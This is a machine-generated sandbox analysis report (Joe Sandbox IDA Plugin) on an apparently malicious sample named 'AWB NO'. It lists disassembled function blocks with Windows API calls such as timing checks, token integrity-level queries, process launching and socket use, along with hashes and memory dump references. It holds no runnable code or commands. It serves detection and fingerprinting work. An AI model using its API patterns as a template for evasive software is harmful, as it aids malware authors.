                                                              • Instruction Fuzzy Hash: 0C014B75200604EFDB204FA6DC88D6B7BADFF89756720097EFC49D2260DA318C18CB64
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465502
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465510
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465518
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465522
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0046555E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: 72de52679d9368bff63ea29de6d144572b9e7e287c6a07ba23d639df65210cf3
                                                              • Instruction ID: 904bb0919bfdc2718e962a82bb6b112c9c46cd464800c0dd09bb372580e459e7
                                                              • Opcode Fuzzy Hash: 72de52679d9368bff63ea29de6d144572b9e7e287c6a07ba23d639df65210cf3
                                                              • Instruction Fuzzy Hash: 1A016131D00A19EBCF00DFE8E84D6EDBB78FB09711F04046AE502F2154EB345954C7AA
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?,?,0045799D), ref: 0045766F
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 0045768A
                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 00457698
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?), ref: 004576A8
                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 004576B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                              • Instruction ID: 2835faaf4413c363fa1ba4ee9e64f4df3655ad9e5f4e5c2265302ab3b3ce24e2
                                                              • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                              • Instruction Fuzzy Hash: 29018472601614BBDB105F58EC44BAE7BADEB44762F140439FD08D2212E735DD4997A4
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00458608
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00458612
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00458621
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00458628
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0045863E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                              • Instruction ID: b254a1de749970eb350751d9d46ef18a572f1fe096513f8760851dcb275af81e
                                                              • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                              • Instruction Fuzzy Hash: 0DF03C31201204AFEB100FA5DCCDE6F3BACEF8A755B10083EF94596261DF659C49DB64
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458669
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00458673
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458682
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458689
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045869F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                              • Instruction ID: 619a58c91ecffcacb0c4c72c0e529b68c3fe02445c7328d4e1caf024910930dc
                                                              • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                              • Instruction Fuzzy Hash: 0BF0AF70200304EFEB111FA4EC88E6B3BACEF8A755B14043EF905D2251DF649C18DB64
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C6BA
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C6D1
                                                              • MessageBeep.USER32(00000000), ref: 0045C6E9
                                                              • KillTimer.USER32(?,0000040A), ref: 0045C705
                                                              • EndDialog.USER32(?,00000001), ref: 0045C71F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: ef350aab00c4addea5b29d025b6c6e34dc14d5866bb1b6e489a2aa35f3095eed
                                                              • Instruction ID: 3003470e8657fa6b09e994d0b3a149c3862edb7236d9b7275a5f5f596171c00c
                                                              • Opcode Fuzzy Hash: ef350aab00c4addea5b29d025b6c6e34dc14d5866bb1b6e489a2aa35f3095eed
                                                              • Instruction Fuzzy Hash: F40144305007049BEB215B60DD8EB9A7778BF04706F00066EF942B15E1EBE4695D8F59
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 004013BF
                                                              • StrokeAndFillPath.GDI32(?,?,0043BAD8,00000000,?), ref: 004013DB
                                                              • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                              • DeleteObject.GDI32 ref: 00401401
                                                              • StrokePath.GDI32(?), ref: 0040141C
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: 5136afe5d618e3a9de46e0e1d94be4e4fa01b3eec21db16889133373e34d653e
                                                              • Instruction ID: f812cb0b4e4429ed7f7e618ed03f07a0aa621b4c15f073e4694ef7f498b4602e
                                                              • Opcode Fuzzy Hash: 5136afe5d618e3a9de46e0e1d94be4e4fa01b3eec21db16889133373e34d653e
                                                              • Instruction Fuzzy Hash: 67F01930001208EFDB516F26EC4CB593BA4AB41326F15C639E829941F1C7358999DF28
                                                              APIs
                                                                • Part of subcall function 004048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004048A1,?,?,004037C0,?), ref: 004048CE
                                                              • CoInitialize.OLE32(00000000), ref: 0046BC26
                                                              • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046BC3F
                                                              • CoUninitialize.OLE32 ref: 0046BC5C
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 3769357847-24824748
                                                              • Opcode ID: 7548b8fafddf0d7f6773bac1ae2287a31057f9780c652219ca288d79e74e43db
                                                              • Instruction ID: 038a0dac91eadc7f8d151fd3961caeb3378ad9cb536dade050a2aa4d4a1657ab
                                                              • Opcode Fuzzy Hash: 7548b8fafddf0d7f6773bac1ae2287a31057f9780c652219ca288d79e74e43db
                                                              • Instruction Fuzzy Hash: 1EA153716042019FCB00DF15C484E5ABBE5FF88318F14899EF899AB3A2DB35ED45CB96
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0045B981
                                                              Strings
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container$%I
                                                              • API String ID: 3565006973-4251005282
                                                              • Opcode ID: 607f608411403fc930b1075844590e2650f926b10a7cd48bb0136dbe69c9fc77
                                                              • Instruction ID: fb3361167640a3393b05a66091946d0b3b2d9ad6d528c81b3883d5ecba530668
                                                              • Opcode Fuzzy Hash: 607f608411403fc930b1075844590e2650f926b10a7cd48bb0136dbe69c9fc77
                                                              • Instruction Fuzzy Hash: 66914B70600601AFDB24DF24C885B6ABBE8FF48711F24856EED49CB392DB74E845CB94
                                                              APIs
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457C32
                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457C4A
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457C6F
                                                              Strings
                                                              Similarity
                                                              • API ID: FromProg$FreeTask
                                                              • String ID: ,,I
                                                              • API String ID: 3873279438-4163367948
                                                              • Opcode ID: 9e9d54a612d361c4c0fd3678b63fb4255e2557ef87f74978d089d1f5f4d79180
                                                              • Instruction ID: f139bf706871657843ff4518930df34df8ed479ad379568e6a589584bca42520
                                                              • Opcode Fuzzy Hash: 9e9d54a612d361c4c0fd3678b63fb4255e2557ef87f74978d089d1f5f4d79180
                                                              • Instruction Fuzzy Hash: 6A814F71A00109EFCB00DF94C984EEEB7B9FF89315F2041A9F905AB251DB75AE09CB64
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004630A6
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00463159
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00463187
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default
                                                              • String ID: 0
                                                              • API String ID: 1306138088-4108050209
                                                              • Opcode ID: c96f9feed46ea861348ea2dc2c74f181596584a91f4e2de55b3b64d3aa70fc60
                                                              • Instruction ID: 5f8f8906756aa80e7caec182ea647f193b7f32e8aa59a0add1d918dcf171f5cd
                                                              • Opcode Fuzzy Hash: c96f9feed46ea861348ea2dc2c74f181596584a91f4e2de55b3b64d3aa70fc60
                                                              • Instruction Fuzzy Hash: FA51E2316083809AD715DF28D845AABB7E8EF56315F04492FF885D32D1EB78CE48879B
                                                              APIs
                                                              • ShellExecuteExW.SHELL32(?), ref: 0047F86A
                                                              • GetProcessId.KERNEL32(00000000), ref: 0047F8E1
                                                              • CloseHandle.KERNEL32(00000000), ref: 0047F910
                                                              Strings
                                                              Similarity
                                                              • API ID: CloseExecuteHandleProcessShell
                                                              • String ID: @
                                                              • API String ID: 1279613386-2766056989
                                                              • Opcode ID: b683b677b22f8557cca32ef78dc32d05fe1a310482d54b8faeb7ec1ad6365912
                                                              • Instruction ID: 1ebb2d383b77566c64692166f8b5d4dc5c82307fe06e73241e304cbf50fef34f
                                                              • Opcode Fuzzy Hash: b683b677b22f8557cca32ef78dc32d05fe1a310482d54b8faeb7ec1ad6365912
                                                              • Instruction Fuzzy Hash: 0061A0B4A00619DFCB14EF55C5809AEBBB4FF48314B15846EE849BB391CB38AD44CF98
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$+
                                                              • API String ID: 0-2552117581
                                                              • Opcode ID: 2e4b4dac41d8fa3973813f9136deec8f86e9e125a8cd0ad71ac30a9b71fd4e1d
                                                              • Instruction ID: 37aff8002e02ada0918aa30981c6d68896c3d675e4df38188cf454e749cffd85
                                                              • Opcode Fuzzy Hash: 2e4b4dac41d8fa3973813f9136deec8f86e9e125a8cd0ad71ac30a9b71fd4e1d
                                                              • Instruction Fuzzy Hash: EB513232200215CBCB14DF28D4986FA7BB0EF55310F548067EC80AB3A2D7389C4ACB69
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00462CCB
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00462D11
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C6890,00000000), ref: 00462D5A
                                                              Strings
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem
                                                              • String ID: 0
                                                              • API String ID: 135850232-4108050209
                                                              • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                              • Instruction ID: 0ba1456fd131f45ac79e83895ae1ccd7d82afcfcc3e6ebc7136bcd4d9a7bd99d
                                                              • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                                                              • Instruction Fuzzy Hash: F8419130204702AFD720DF25C944B5BB7E4AF85324F14462EF96597291E7B8E904CBAB
                                                              APIs
                                                                • Part of subcall function 004648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004638D3,?), ref: 004648C7
                                                                • Part of subcall function 004648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004638D3,?), ref: 004648E0
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004638F3
                                                              • MoveFileW.KERNEL32(?,?), ref: 00463927
                                                              • SHFileOperationW.SHELL32(?), ref: 004639DB
                                                              Strings
                                                              Similarity
                                                              • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 67141772-1173974218
                                                              • Opcode ID: a90d459c768cc163fe9283aa5f59c6cb855b2075852a39a0894f902b4179bc6f
                                                              • Instruction ID: 2b247b45c35498576e4f5c769069253896ee45310ec86603c536ea1ec2fbf65f
                                                              • Opcode Fuzzy Hash: a90d459c768cc163fe9283aa5f59c6cb855b2075852a39a0894f902b4179bc6f
                                                              • Instruction Fuzzy Hash: 7A41A3B15083849AC751EF65D4419DFB7E8AF88345F40082FB489C3261FA79D68CCB5B
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004876D0
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004876E4
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487708
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 48ced059ccaca18a31bf9734e89f21d61143e7f73e3f118914c4c81aacdb26e5
                                                              • Instruction ID: b11ebb0591133ad0ceca22569c350ac422542bbf5e6f42f70d3245ea3f349615
                                                              • Opcode Fuzzy Hash: 48ced059ccaca18a31bf9734e89f21d61143e7f73e3f118914c4c81aacdb26e5
                                                              • Instruction Fuzzy Hash: 3321AD32500218ABDF119FA4CC42FEF3B69EF48724F210619FA157B1D0DAB9E8559BA4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486FAA
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486FBA
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486FDF
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 50f4d73c5b6d16030b768c105e68ad76c3469d1e98ef9a13d2c05636ed066bfe
                                                              • Instruction ID: 0ce34a500377e520db2c9b3f5edb2fec5616d4ee1fe5b53d930dc8dde0b0bcbf
                                                              • Opcode Fuzzy Hash: 50f4d73c5b6d16030b768c105e68ad76c3469d1e98ef9a13d2c05636ed066bfe
                                                              • Instruction Fuzzy Hash: 4321D032610118BFDF51AF54DC84EAF37AAEF89754F028529FB049B290CA75EC518BA4
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AEBF
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046AF13
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046AF6A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume
                                                              • String ID: %lu
                                                              • API String ID: 2507767853-685833217
                                                              APIs
                                                                • Part of subcall function 0045A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0045A399
                                                                • Part of subcall function 0045A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A3AC
                                                                • Part of subcall function 0045A37C: GetCurrentThreadId.KERNEL32 ref: 0045A3B3
                                                                • Part of subcall function 0045A37C: AttachThreadInput.USER32(00000000), ref: 0045A3BA
                                                              • GetFocus.USER32 ref: 0045A554
                                                                • Part of subcall function 0045A3C5: GetParent.USER32(?), ref: 0045A3D3
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045A59D
                                                              • EnumChildWindows.USER32(?,0045A615), ref: 0045A5C5
                                                              Strings
                                                              Similarity
                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                              • String ID: %s%d
                                                              • API String ID: 2776554818-1110647743
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004879E1
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004879F6
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487A03
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,004232EA,00000000,?,00429EFE,000000FF,0000001E,004BBE28,00000008,00429E62,00000000,00000000), ref: 004232BA
                                                              • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004232CC
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 1646373207-1276376045
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404C2E), ref: 00404CA3
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404CB5
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404D2E,?,00404F4F,?,004C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404D6F
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404D81
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00404CE1,?), ref: 00404DA2
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404DB4
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,004812C1), ref: 00481080
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00481092
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00479009,?,0048F910), ref: 00479403
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479415
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 004783D8
                                                              • CoUninitialize.OLE32 ref: 004783E3
                                                                • Part of subcall function 0045DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045DAC5
                                                              • VariantInit.OLEAUT32(?), ref: 004783EE
                                                              • VariantClear.OLEAUT32(?), ref: 004786BF
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              APIs
                                                                • Part of subcall function 00429E4B: EnterCriticalSection.KERNEL32(00000000,?,00429CBC,0000000D), ref: 00429E76
                                                              • GetStartupInfoW.KERNEL32(?,004BBF10,00000064,00427F27,004BBD38,00000014), ref: 0042D8A5
                                                              • GetFileType.KERNEL32(00000001), ref: 0042D939
                                                              Similarity
                                                              • API ID: CriticalEnterFileInfoSectionStartupType
                                                              • String ID:
                                                              • API String ID: 4158522439-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              APIs
                                                              • GetWindowRect.USER32(0106F260,?), ref: 00489AD2
                                                              • ScreenToClient.USER32(00000002,00000002), ref: 00489B05
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489B72
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00476CE4
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476CF4
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476D58
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476D64
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$socket
                                                              • String ID:
                                                              • API String ID: 1881357543-0
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046BB09
                                                              • GetLastError.KERNEL32(?,00000000), ref: 0046BB2F
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046BB54
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046BB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
